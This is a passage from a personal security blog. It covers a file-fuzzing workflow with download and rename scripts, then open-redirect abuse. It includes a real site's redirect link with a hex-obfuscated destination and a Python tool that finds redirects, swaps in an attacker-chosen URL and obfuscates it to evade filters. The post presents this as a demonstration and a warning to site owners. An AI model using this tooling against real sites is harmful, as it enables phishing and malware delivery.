Note as well that the second part -- actually downloading the files -- was taking a very long time, and as such I made a script of just this part so that I could run it on several different machines, which sped the download up considerably.
This is that script:
This was just used by splitting up the list in the textfile created in the first script and using it on different VMs.
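The downloader itself isn't reproduced above, but the idea is simple enough to sketch: read one URL per line from the textfile the first script produced and fetch each file (the function and file names here are my own assumptions, not the original script's):

```python
# Sketch of a bulk downloader: fetch every URL listed in a text
# file (one per line) and save the results into a directory.
import os
import urllib.request  # python 3; scripts of this era would have used urllib2

def download_all(list_file, out_dir):
    if not os.path.isdir(out_dir):
        os.makedirs(out_dir)
    with open(list_file) as f:
        urls = [line.strip() for line in f if line.strip()]
    for n, url in enumerate(urls):
        dest = os.path.join(out_dir, 'sample%04d.pdf' % n)
        try:
            urllib.request.urlretrieve(url, dest)
        except IOError as e:
            print('failed: %s (%s)' % (url, e))

# split the URL list into chunks and run one chunk per VM
```

Splitting the list file into chunks and running one chunk per machine is what parallelised the download.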
Once this was done, I decided I wanted to give all the files a generic name, as I would be making lots of slightly different copies of each file. So for this I created (yet another) script so that all the files would be named A.pdf, B.pdf, C.pdf .. AA.pdf, AB.pdf....
This was going to be used with upper and lower case letters; however, after 2 hours of frustration I remembered that it's a case-insensitive drive (damn Macs!!) and therefore ab.pdf is the same as AB.pdf (on the drive, not in the terminal, before anyone tries to argue with me).
Anyway, this script is really bad and I'm sure there's a better way to increment a letter after Z using mod, but I couldn't figure it out and was tired, so here's my script for this part too:
#!/usr/bin/python
# rename.py: give every file in a directory a short generic name
# usage: rename.py <directory/> <extension>
import os
import subprocess
from sys import argv

array = [chr(c) for c in range(ord('A'), ord('Z') + 1)]
for index, i in enumerate(sorted(os.listdir(argv[1]))):
    if index < len(array):
        newFile = array[index] + '.' + argv[2]
    elif index < (len(array)**2):
        # note: two-letter names start at BA rather than AA;
        # the names are still unique, which is all this job needs
        firstLetter = array[index/len(array)]
        secondPart = index%(len(array))
        secondLetter = array[secondPart]
        newFile = firstLetter + secondLetter + '.' + argv[2]
    elif index < (len(array)**3):
        firstPart = index/(len(array)**2)
        firstLetter = array[firstPart]
        secondPart = index%(len(array)**2)
        secondLetter = array[secondPart/len(array)]
        thirdPart = secondPart%(len(array))
        thirdLetter = array[thirdPart]
        newFile = firstLetter + secondLetter + thirdLetter + '.' + argv[2]
    else:
        continue
    cmd = 'mv ' + argv[1] + i + ' ' + argv[1] + newFile
    output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(It's not pretty, but I don't care, I'm giving it away on a blog for crying out loud.)
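For what it's worth, the "increment a letter after Z" problem can be solved generically with itertools.product; this is a cleaner alternative sketch, not the script I actually ran:

```python
import itertools
import string

def names(ext, maxlen=3):
    """Yield A.<ext> .. Z.<ext>, then AA.<ext> .. ZZ.<ext>, and so on,
    in order, up to names of maxlen letters."""
    for length in range(1, maxlen + 1):
        for letters in itertools.product(string.ascii_uppercase, repeat=length):
            yield ''.join(letters) + '.' + ext

# pair each generated name with a file and mv it into place
```

itertools.product does the carry-past-Z arithmetic for free, and covers the whole A..ZZZ range without any of the mod juggling above.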
If you want, you can fuzz any way you like. You may want to use the '5 lines of python' that Charlie Miller swears by (which actually came to about 20-35 lines when I managed to get it into a python program -- still fairly small, but that's only for generating the fuzzed files). If going this last route on Windows, one way to test the fuzzed files would be FileFuzz http://fuzzing.org/wp-content/FileFuzz.zip It's not amazing, but I can't see any reason why you couldn't put a lot of fuzzed files into a directory and tell it to use them; I'm just not sure exactly what FileFuzz has checks for, and some trial-and-error testing may be needed, a sample at a time, in order to get the time needed per test down properly.
Anyway I hope if you try to do any fuzzing that this gives you some help on the basics, and ways you could go about it.
--lavamunky
Sunday 27 March 2011
The power of redirection
http://dw.com.com/redir?edId=3&siteId=4&oId=1770-5_1-0&ontId=5_1&spi=8caeb9bceb2ff504061831b7a696ddde&lop=link<ype=dl_dlnow&pid=11355671&mfgId=50119&merId=50119&pguid=V95vrAoOYJAAABI7QlIAAABo&ttag=tdw_dltext;&destUrl=http%3A%2F%2Fwww.microsoft.com%2Fwindows%2Fwindows-7%2Fdownload.aspx
And clicking on
http://dw.com.com/redir?edId=3&siteId=4&oId=1770-5_1-0&ontId=5_1&spi=8caeb9bceb2ff504061831b7a696ddde&lop=link<ype=dl_dlnow&pid=11355671&mfgId=50119&merId=50119&pguid=V95vrAoOYJAAABI7QlIAAABo&ttag=tdw_dltext;&destUrl=%68%74%74%70%3a%2f%2f%77%77%77%2e%6c%61%76%61%6d%75%6e%6b%79%2e%63%6f%6d
It’s surprising that spammers have not considered this method. If a mail server checks the content of emails for links to blacklisted websites, a redirect could get around this, especially if obfuscated in such a way as above.
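The obfuscated destUrl above is nothing exotic: each character of the destination is just replaced by a percent-escaped hex value, which takes one line of python (a standalone sketch, separate from the tool below):

```python
def obfuscate(url):
    """Percent-encode every character of a URL as its hex value,
    e.g. 'www' becomes '%77%77%77'."""
    return ''.join('%%%02x' % ord(c) for c in url)

link = obfuscate('http://www.lavamunky.com')
# browsers happily decode this back to the plain URL when it's followed
```

Since the browser decodes it transparently but a naive string filter doesn't, the obfuscated form sails straight past a blacklist match on the plain URL.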
This is a hacker’s dream. People go onto a legitimate website that they’ve used hundreds of times before, they click on a link for, say Windows 7 SP1 (as is the one above), and a link that should take them to the Microsoft website instead takes them to a malicious website that contains malware that uses vulnerabilities fixed with SP1 (unlike the one above, promise ;) ).
Especially in recent times, with such huge catastrophes happening around the world, people are a bit wary, but they still want to give money. This is a huge opportunity for attackers, and as such large websites, especially those that are foundations taking people’s donations, need to make sure that there aren’t open redirects on their websites.
To show the ease of taking a normal page, finding redirects and exploiting them I have written this tool in Python:
(Note: This tool is for education purposes only. The author does not take any responsibility for any damage caused and does not condone this being used for illegal purposes.)
#!/usr/bin/python
from sys import exit, argv
import re
from optparse import OptionParser

defaultUsage = 'usage: %prog [options]'
parser = OptionParser(usage=defaultUsage)
parser.add_option('-f', '--file', action="store", type="string", dest="file", help="File for searching for redirects")
parser.add_option('-u', '--url', action="store", type="string", dest="url", help="A URL to replace the redirect, e.g. www.lavamunky.com")
parser.add_option('-o', '--obfuscate', action="store_true", dest="obfuscate", help="Obfuscate a URL by converting to hex then URL encode. Note: -u option also needed.\nE.g. http://www.lavamunky.com becomes \nhttp%3A%2F%2F%77%77%77%2E%6C%61%76%61%6D%75%6E%6B%79%2E%63%6F%6D%2F")
(options, args) = parser.parse_args()

separator = '---------------------------------------------------------------------------\n\n'

if not (options.file):
    print defaultUsage
    exit(1)

filename = options.file
file = open(filename, 'r')
text = file.read()

urlPattern = 'http((\:\/\/)|(\%3A\%2F\%2F))\w*[.\w]+[\/\?+\=+\&+\%+\.+\;+\-+\_+\++\w+]*\"'
redir = 'http((\:\/\/)|(\%3A\%2F\%2F))\S*redir\S*\='+urlPattern #won't match all redirects but is good enough for my needs
match = re.findall(r'('+redir+')', text)
if not match:
    print "No redirects found!"
    exit(1)

uniqueMatch = []
for elem in match:
    if elem not in uniqueMatch:
        uniqueMatch.append(elem)

if options.obfuscate:
    if not options.url:
        print "A url is needed with -u in order to obfuscate"
        exit(1)

if (options.url):
    url = options.url
    if url[:4]!='http':
        url = 'http://'+url
    if options.obfuscate: #convert to hex then effectively url encode, so A becomes %41 etc
        url = url.encode('hex')
        tempList = list(url)
        i = 0
        j = len(tempList)
        while (i < j):
            tempList.insert(i, '%')
            i+=3
            j = len(tempList)
        url = ''.join(tempList)
    for elem in uniqueMatch:
        original = elem[0] + '\n\nbecomes:\n\n'
        print original
        replaced = re.sub(r'\='+urlPattern, '='+url, elem[0]) #replace the strings
        print replaced+'\n\n'
        print separator #just presents it in an easy to read way
else:
    for elem in uniqueMatch:
        print elem[0] + '\n'

redirects = len(uniqueMatch)
if redirects!=0:
    print str(redirects) + ' redirects found\n' #tells you how many found for good measure
I originally wanted to create a proxy server, which would then find all the redirects as I surfed the Internet; however, I wanted something I could create in a couple of hours.
This program takes in a file such as the source code from a webpage with the -f option and prints out the redirects. If you specify -u you can specify a URL you want changed into the redirect, and -o to then obfuscate this.
To test this out you can use the source from the web page:
http://www.cnet.com/1770-5_1-0.html?query=windows+7+sp1&tag=srch
As you can see from the URL, this came from searching for windows 7 sp1 on cnet’s website, and the redirect at the top of the page came from this page.
There seem to be quite a few redirects which require the user to log in first, but this doesn’t fix the problem, since if it is a targeted attack, the attacker will use a website that the target probably has a login for.
Either way redirects can be very dangerous, and shouldn’t be a problem that gets put off.